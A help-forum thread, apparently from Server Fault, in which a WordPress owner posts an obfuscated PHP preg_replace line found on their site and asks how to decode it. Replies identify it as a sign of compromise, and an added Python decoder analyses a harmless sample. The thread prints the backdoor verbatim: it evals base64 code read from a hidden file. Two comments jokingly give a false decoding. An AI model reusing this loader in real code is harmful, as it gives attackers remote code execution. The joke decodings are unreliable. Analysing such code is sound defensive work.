-4

Possible Duplicate:
My server's been hacked EMERGENCY

I'm seeing the below junk code in one of my WordPress files.

```php
@preg_replace("\x21\50\x2e\53\x29\41\x73\145","\x65\166\x61\154\x28\47\x24\150\x79\162\x3d\67\x35\61\x34\71\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x68\171\x72\75\x37\65\x31\64\x39\73","\x4c\63\x64\63\x64\171\x39\172\x61\130\x52\154\x63\171\x39\150\x59\155\x55\166\x4e\152\x42\154\x4c\63\x64\63\x64\171\x35\155\x59\130\x4e\60\x5a\130\x4a\156\x62\107\x39\151\x59\127\x77\165\x59\62\x39\164\x4c\63\x64\154\x59\151\x39\151\x62\107\x39\156\x4c\63\x64\167\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x4e\150\x59\62\x68\154\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75");
```

How do I decode this? I read in an article that we can decode this using Python. Can a Python expert decode the below and help me?

```python
# Python decodes the \xHH and octal escapes when it parses each literal;
# nothing from the PHP file is executed.
print (b"\x21\50\x2e\53\x29\41\x73\145")
print (b"\x65\166\x61\154\x28\47\x24\150\x79\162\x3d\67\x35\61\x34\71\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x68\171\x72\75\x37\65\x31\64\x39\73","\x4c\63\x64\63\x64\171\x39\172\x61\130\x52\154\x63\171\x39\150\x59\155\x55\166\x4e\152\x42\154\x4c\63\x64\63\x64\171\x35\155\x59\130\x4e\60\x5a\130\x4a\156\x62\107\x39\151\x59\127\x77\165\x59\62\x39\164\x4c\63\x64\154\x59\151\x39\151\x62\107\x39\156\x4c\63\x64\167\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x4e\150\x59\62\x68\154\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75")
```

Thanks.

Kesav
  • My secret decoder ring comes up with "Eat at Joe\'s". Anyone else get that? – gWaldo Aug 03 '12 at 13:27
  • No, I most definitely do not get that. The filename it's trying to evaluate includes the path element `www.fasterglobal.com`... – womble Aug 03 '12 at 13:28

1 Answer

1

If you didn't put it there, get rid of it. Nobody writes legitimate code like that. You may have been hacked.

See How do I deal with a compromised server?

gWaldo
  • It only "may" have been hacked? It's pwned. Take off and nuke it from orbit. – womble Aug 03 '12 at 13:13
  • Decoded it reads "Eat at Joe\'s" – gWaldo Aug 03 '12 at 13:26
  • Thanks for your response. Does it provide any further information related to what script/files are being called and any path from where the script is being called so that I can trace the backdoor? – Kesav Aug 03 '12 at 19:17
  • This question addresses a similar issue, and the talk about the decoding: http://serverfault.com/q/249190/50875 – gWaldo Aug 03 '12 at 19:38
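
The decoding asked about in the question, as an added example that is not part of the original thread: a static decoder for the `\xHH`/octal escapes and the base64 third argument of such a `preg_replace` call, which reports the `e` modifier without running any of the code. The sample call is constructed (only its pattern comes from the question), and `php_unescape` and `analyze` are names chosen for this example.

```python
import base64
import re

# PHP double-quoted escapes used by this kind of obfuscation:
# \xHH (1-2 hex digits) and \NNN (1-3 octal digits).
_ESC = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
# A double-quoted PHP string literal, allowing backslash escapes inside.
_STR = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed sample in the same encoding. Only the first argument is the
# pattern from the question; the other two are harmless stand-ins.
SAMPLE = (r'@preg_replace("\x21\50\x2e\53\x29\41\x73\145",'
          r'"\x73\164\x72\154\x65\156\x28\42\x5c\61\x22\51",'
          r'"\x4c\63\x52\164\x63\103\x39\64");')


def php_unescape(literal: str) -> str:
    """Decode \\xHH and octal escapes in one pass, without executing anything."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)  # PHP keeps only the low byte
    return _ESC.sub(repl, literal)


def analyze(php_source: str) -> dict:
    """Statically decode the three string arguments of a preg_replace() call."""
    pattern, replacement, subject = (
        php_unescape(s) for s in _STR.findall(php_source)[:3])
    # Modifiers follow the closing delimiter (assumed to equal the opening one).
    modifiers = pattern[pattern.rfind(pattern[0]) + 1:]
    try:
        decoded = base64.b64decode(subject, validate=True).decode("utf-8", "replace")
    except ValueError:  # not valid base64
        decoded = None
    return {
        "pattern": pattern,
        "replacement": replacement,
        # With the "e" modifier, old PHP versions run the replacement as code.
        "evaluates_replacement": "e" in modifiers,
        "subject_decoded": decoded,
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```

Run against the text of a suspect line, `analyze` returns the decoded pattern, replacement and path as plain strings that can be searched for on disk and in logs.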